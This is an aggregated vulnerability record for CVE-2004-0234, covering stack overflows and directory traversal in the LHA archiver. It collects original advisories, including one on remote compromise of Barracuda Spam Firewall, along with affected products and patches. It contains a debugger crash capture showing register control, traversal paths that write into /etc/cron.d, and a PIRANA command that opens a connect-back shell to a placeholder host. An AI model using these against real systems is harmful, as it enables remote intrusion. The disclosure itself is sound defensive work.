ID

VAR-200408-0140


CVE

CVE-2004-0234


TITLE

LHa Vuffer Overflow Vulnerability in Testing and Extracting Process

Trust: 0.8

sources: JVNDB: JVNDB-2004-000169

DESCRIPTION

Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. These vulnerabilities are related to: SA11510 SA19002 Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------ LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal) * DESCRIPTION * LHa is a console-based program for packing and unpacking LHarc archives. It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD. * OVERVIEW * LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough. By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture: $ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $ b) two directory traversal problems LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil". * ATTACHED FILES * I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives. * TIMELINE * 18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory // Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/ ------------------------------------------------------------------------ . TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow SECUNIA ADVISORY ID: SA19002 VERIFY ADVISORY: http://secunia.com/advisories/19002/ CRITICAL: Moderately critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: zoo 2.x http://secunia.com/product/8297/ DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive). The vulnerability has been confirmed in version 2.10. Other versions may also be affected. SOLUTION: Restrict use to trusted ZOO archives. PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Barracuda LHA archiver security bug leads to remote compromise Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234 I. BACKGROUND The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection: * Anti-spam * Anti-virus * Anti-spoofing * Anti-phishing * Anti-spyware (Attachments) * Denial of Service II. DESCRIPTION When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall. You do NOT need to have remote administration access (on port 8000) for successfull exploitation. For further informations about the details of the bugs, you can consult OSVDB #5753 and #5754 . III. IMPACT Gain shell access to the remote Barracuda Spam Firewall IV. PROOF OF CONCEPT Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability. By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234: perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1 V. SOLUTION Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006. They also published an official patch in firmware #3.3.03.022, available April 3rd 2006. It is recommended to update to firmware #3.3.03.022 . VI. CREDITS Ulf Harnhammar who found the original LHA flaw. Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework. VII. REFERENCES http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234 VIII. HISTORY 2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public

Trust: 2.34

sources: NVD: CVE-2004-0234 // JVNDB: JVNDB-2004-000169 // BID: 10243 // VULHUB: VHN-8664 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164

AFFECTED PRODUCTS

vendor:f securemodel:f-secure personal expressscope:eqversion:4.7

Trust: 1.6

vendor:winzipmodel:winzipscope:eqversion:9.0

Trust: 1.3

vendor:stalkermodel:cgpmcafeescope:eqversion:3.2

Trust: 1.3

vendor:sgimodel:propackscope:eqversion:3.0

Trust: 1.3

vendor:sgimodel:propackscope:eqversion:2.4

Trust: 1.3

vendor:rarlabmodel:winrarscope:eqversion:3.20

Trust: 1.3

vendor:f securemodel:internet gatekeeperscope:eqversion:6.32

Trust: 1.3

vendor:f securemodel:internet gatekeeperscope:eqversion:6.31

Trust: 1.3

vendor:f securemodel:f-secure for firewallsscope:eqversion:6.20

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.13

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.11

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.10

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.8

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.7

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.6

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.5

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.4

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.3

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.2

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.1

Trust: 1.3

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.0

Trust: 1.3

vendor:f securemodel:f-secure personal expressscope:eqversion:4.6

Trust: 1.0

vendor:f securemodel:f-secure internet securityscope:eqversion:2003

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:2003

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:5.42

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:5.52

Trust: 1.0

vendor:f securemodel:f-secure internet securityscope:eqversion:2004

Trust: 1.0

vendor:tsugio okamotomodel:lhascope:eqversion:1.15

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:5.41

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:4.51

Trust: 1.0

vendor:f securemodel:f-secure personal expressscope:eqversion:4.5

Trust: 1.0

vendor:redhatmodel:fedora corescope:eqversion:core_1.0

Trust: 1.0

vendor:redhatmodel:lhascope:eqversion:1.14i-9

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:2004

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:4.52

Trust: 1.0

vendor:tsugio okamotomodel:lhascope:eqversion:1.14

Trust: 1.0

vendor:tsugio okamotomodel:lhascope:eqversion:1.17

Trust: 1.0

vendor:clearswiftmodel:mailsweeperscope:eqversion:4.3.6_sp1

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:4.60

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:6.21

Trust: 1.0

vendor:f securemodel:f-secure anti-virusscope:eqversion:5.5

Trust: 1.0

vendor:lha for unixmodel:lha for unixscope:lteversion:1.17

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:2.1 (as)

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:2.1 (es)

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:2.1 (ws)

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:3 (as)

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:3 (es)

Trust: 0.8

vendor:red hatmodel:enterprise linuxscope:eqversion:3 (ws)

Trust: 0.8

vendor:red hatmodel:enterprise linux desktopscope:eqversion:3.0

Trust: 0.8

vendor:red hatmodel:linuxscope:eqversion:9

Trust: 0.8

vendor:red hatmodel:linux advanced workstationscope:eqversion:2.1

Trust: 0.8

vendor:redhatmodel:linux i686scope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:linux i386scope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:linuxscope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:lha-1.14i-9.i386.rpmscope: - version: -

Trust: 0.3

vendor:redmodel:hat fedora core1scope: - version: -

Trust: 0.3

vendor:mrmodel:s.k. lhascope:eqversion:1.17

Trust: 0.3

vendor:mrmodel:s.k. lhascope:eqversion:1.15

Trust: 0.3

vendor:mrmodel:s.k. lhascope:eqversion:1.14

Trust: 0.3

vendor:mcafeemodel:webshield smtpscope:eqversion:4.5

Trust: 0.3

vendor:mcafeemodel:webshield appliancesscope: - version: -

Trust: 0.3

vendor:mcafeemodel:virusscan professionalscope: - version: -

Trust: 0.3

vendor:mcafeemodel:virusscan for netappscope: - version: -

Trust: 0.3

vendor:mcafeemodel:virusscan enterprise iscope:eqversion:8.0

Trust: 0.3

vendor:mcafeemodel:virusscan command linescope: - version: -

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:9.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:8.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:7.1

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:7.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:6.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:5.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:4.5.1

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:4.5

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:4.0.3

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:4.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:3.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:2.0

Trust: 0.3

vendor:mcafeemodel:virusscanscope:eqversion:1.0

Trust: 0.3

vendor:mcafeemodel:virexscope: - version: -

Trust: 0.3

vendor:mcafeemodel:securityshield for microsoft isa serverscope: - version: -

Trust: 0.3

vendor:mcafeemodel:portalshield for microsoft sharepointscope: - version: -

Trust: 0.3

vendor:mcafeemodel:netshield for netwarescope: - version: -

Trust: 0.3

vendor:mcafeemodel:managed virusscanscope: - version: -

Trust: 0.3

vendor:mcafeemodel:linuxshieldscope: - version: -

Trust: 0.3

vendor:mcafeemodel:internet security suitescope: - version: -

Trust: 0.3

vendor:mcafeemodel:groupshield for mail servers with eposcope: - version: -

Trust: 0.3

vendor:mcafeemodel:groupshield for lotus dominoscope: - version: -

Trust: 0.3

vendor:mcafeemodel:groupshield for exchangescope:eqversion:5.5

Trust: 0.3

vendor:mcafeemodel:asap virusscanscope:eqversion:0

Trust: 0.3

vendor:mcafeemodel:active virus defense smb editionscope: - version: -

Trust: 0.3

vendor:mcafeemodel:active threat protectionscope: - version: -

Trust: 0.3

vendor:mcafeemodel:active mail protectionscope: - version: -

Trust: 0.3

vendor:f securemodel:personal expressscope:eqversion:4.7

Trust: 0.3

vendor:f securemodel:personal expressscope:eqversion:4.6

Trust: 0.3

vendor:f securemodel:personal expressscope:eqversion:4.5

Trust: 0.3

vendor:f securemodel:internet securityscope:eqversion:2004

Trust: 0.3

vendor:f securemodel:internet securityscope:eqversion:2003

Trust: 0.3

vendor:f securemodel:anti-virus for workstationsscope:eqversion:5.42

Trust: 0.3

vendor:f securemodel:anti-virus for workstationsscope:eqversion:5.41

Trust: 0.3

vendor:f securemodel:anti-virus for windows serversscope:eqversion:5.42

Trust: 0.3

vendor:f securemodel:anti-virus for windows serversscope:eqversion:5.41

Trust: 0.3

vendor:f securemodel:anti-virus for samba serversscope:eqversion:4.60

Trust: 0.3

vendor:f securemodel:anti-virus for ms exchangescope:eqversion:6.21

Trust: 0.3

vendor:f securemodel:anti-virus for mimesweeperscope:eqversion:5.42

Trust: 0.3

vendor:f securemodel:anti-virus for mimesweeperscope:eqversion:5.41

Trust: 0.3

vendor:f securemodel:anti-virus for linux workstationsscope:eqversion:4.52

Trust: 0.3

vendor:f securemodel:anti-virus for linux workstationsscope:eqversion:4.51

Trust: 0.3

vendor:f securemodel:anti-virus for linux serversscope:eqversion:4.52

Trust: 0.3

vendor:f securemodel:anti-virus for linux serversscope:eqversion:4.51

Trust: 0.3

vendor:f securemodel:anti-virus for linux gatewaysscope:eqversion:4.52

Trust: 0.3

vendor:f securemodel:anti-virus for linux gatewaysscope:eqversion:4.51

Trust: 0.3

vendor:f securemodel:anti-virus client securityscope:eqversion:5.52

Trust: 0.3

vendor:f securemodel:anti-virus client securityscope:eqversion:5.50

Trust: 0.3

vendor:f securemodel:anti-virusscope:eqversion:2004

Trust: 0.3

vendor:f securemodel:anti-virusscope:eqversion:2003

Trust: 0.3

vendor:clearswiftmodel:mailsweeper sp1scope:eqversion:4.3.6

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.1.18

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:eqversion:3.1.17

Trust: 0.3

vendor:barracudamodel:networks barracuda spam firewallscope:neversion:3.3.03.022

Trust: 0.3

sources: BID: 10243 // JVNDB: JVNDB-2004-000169 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2004-0234
value: HIGH

Trust: 1.0

NVD: CVE-2004-0234
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200408-202
value: CRITICAL

Trust: 0.6

VULHUB: VHN-8664
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2004-0234
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-8664
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-8664 // JVNDB: JVNDB-2004-000169 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.1

sources: VULHUB: VHN-8664 // NVD: CVE-2004-0234

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200408-202

CONFIGURATIONS

sources: JVNDB: JVNDB-2004-000169

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-8664

PATCH

title:LHA for UNIX Version 1.17url:http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/

Trust: 0.8

title:Top Pageurl:http://lha.sourceforge.jp/

Trust: 0.8

title:RHSA-2004:178url:https://rhn.redhat.com/errata/RHSA-2004-178.html

Trust: 0.8

title:RHSA-2004:179url:https://rhn.redhat.com/errata/RHSA-2004-179.html

Trust: 0.8

sources: JVNDB: JVNDB-2004-000169

EXTERNAL IDS

db:NVDid:CVE-2004-0234

Trust: 3.0

db:BIDid:10243

Trust: 2.8

db:OSVDBid:5754

Trust: 2.5

db:OSVDBid:5753

Trust: 2.5

db:SECTRACKid:1015866

Trust: 2.5

db:SECUNIAid:19514

Trust: 1.8

db:VUPENid:ADV-2006-1220

Trust: 1.7

db:XFid:16012

Trust: 1.4

db:JVNDBid:JVNDB-2004-000169

Trust: 0.8

db:FULLDISCid:20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS

Trust: 0.6

db:FULLDISCid:20040502 LHA LOCAL STACK OVERFLOW PROOF OF CONCEPT CODE

Trust: 0.6

db:FEDORAid:FEDORA-2004-119

Trust: 0.6

db:FEDORAid:FLSA:1833

Trust: 0.6

db:REDHATid:RHSA-2004:179

Trust: 0.6

db:REDHATid:RHSA-2004:178

Trust: 0.6

db:BUGTRAQid:20060403 BARRACUDA LHA ARCHIVER SECURITY BUG LEADS TO REMOTE COMPROMISE

Trust: 0.6

db:BUGTRAQid:20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH

Trust: 0.6

db:OVALid:OVAL:ORG.MITRE.OVAL:DEF:977

Trust: 0.6

db:OVALid:OVAL:ORG.MITRE.OVAL:DEF:9881

Trust: 0.6

db:GENTOOid:GLSA-200405-02

Trust: 0.6

db:DEBIANid:DSA-515

Trust: 0.6

db:CONECTIVAid:CLA-2004:840

Trust: 0.6

db:CNNVDid:CNNVD-200408-202

Trust: 0.6

db:PACKETSTORMid:33241

Trust: 0.2

db:VULHUBid:VHN-8664

Trust: 0.1

db:PACKETSTORMid:45159

Trust: 0.1

db:SECUNIAid:19002

Trust: 0.1

db:PACKETSTORMid:44104

Trust: 0.1

db:PACKETSTORMid:45164

Trust: 0.1

sources: VULHUB: VHN-8664 // BID: 10243 // JVNDB: JVNDB-2004-000169 // PACKETSTORM: 45159 // PACKETSTORM: 33241 // PACKETSTORM: 44104 // PACKETSTORM: 45164 // CNNVD: CNNVD-200408-202 // NVD: CVE-2004-0234

REFERENCES

url:http://www.securityfocus.com/bid/10243

Trust: 2.5

url:http://securitytracker.com/id?1015866

Trust: 2.5

url:http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html

Trust: 2.0

url:http://marc.info/?l=bugtraq&m=108422737918885&w=2

Trust: 1.8

url:http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html

Trust: 1.7

url:http://www.debian.org/security/2004/dsa-515

Trust: 1.7

url:https://bugzilla.fedora.us/show_bug.cgi?id=1833

Trust: 1.7

url:http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html

Trust: 1.7

url:http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020778.html

Trust: 1.7

url:http://security.gentoo.org/glsa/glsa-200405-02.xml

Trust: 1.7

url:http://www.guay-leroux.com/projects/barracuda-advisory-lha.txt

Trust: 1.7

url:http://www.osvdb.org/5753

Trust: 1.7

url:http://www.osvdb.org/5754

Trust: 1.7

url:http://www.redhat.com/support/errata/rhsa-2004-178.html

Trust: 1.7

url:http://www.redhat.com/support/errata/rhsa-2004-179.html

Trust: 1.7

url:http://secunia.com/advisories/19514

Trust: 1.7

url:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000840

Trust: 1.6

url:http://www.frsirt.com/english/advisories/2006/1220

Trust: 1.4

url:http://xforce.iss.net/xforce/xfdb/16012

Trust: 1.4

url:http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:977

Trust: 1.4

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a977

Trust: 1.1

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9881

Trust: 1.1

url:http://www.vupen.com/english/advisories/2006/1220

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/16012

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0234

Trust: 0.9

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0234

Trust: 0.8

url:http://osvdb.org/5753

Trust: 0.8

url:http://osvdb.org/5754

Trust: 0.8

url:http://marc.theaimsgroup.com/?l=bugtraq&m=108422737918885&w=2

Trust: 0.6

url:http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9881

Trust: 0.6

url:http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/

Trust: 0.4

url:http://www.barracudanetworks.com/ns/products/spam_overview.php

Trust: 0.3

url:http://www.stalker.com/cgpmcafee/

Trust: 0.3

url:http://www.f-secure.com/security/fsc-2004-1.shtml

Trust: 0.3

url:http://mail.stalker.com/lists/cgatepro/message/61244.html

Trust: 0.3

url:http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2004-178.html

Trust: 0.3

url:http://rhn.redhat.com/errata/rhsa-2004-219.html

Trust: 0.3

url:http://www.rarsoft.com/

Trust: 0.3

url:http://www.winzip.com/

Trust: 0.3

url:/archive/1/366265

Trust: 0.3

url:http://secunia.com/secunia_security_advisories/

Trust: 0.2

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.2

url:http://secunia.com/about_secunia_advisories/

Trust: 0.2

url:http://secunia.com/advisories/19002/

Trust: 0.2

url:http://marc.info/?l=bugtraq&amp;m=108422737918885&amp;w=2

Trust: 0.1

url:http://distro.conectiva.com.br/atualizacoes/?id=a&amp;anuncio=000840

Trust: 0.1

url:http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044875.html

Trust: 0.1

url:http://secunia.com/product/4639/

Trust: 0.1

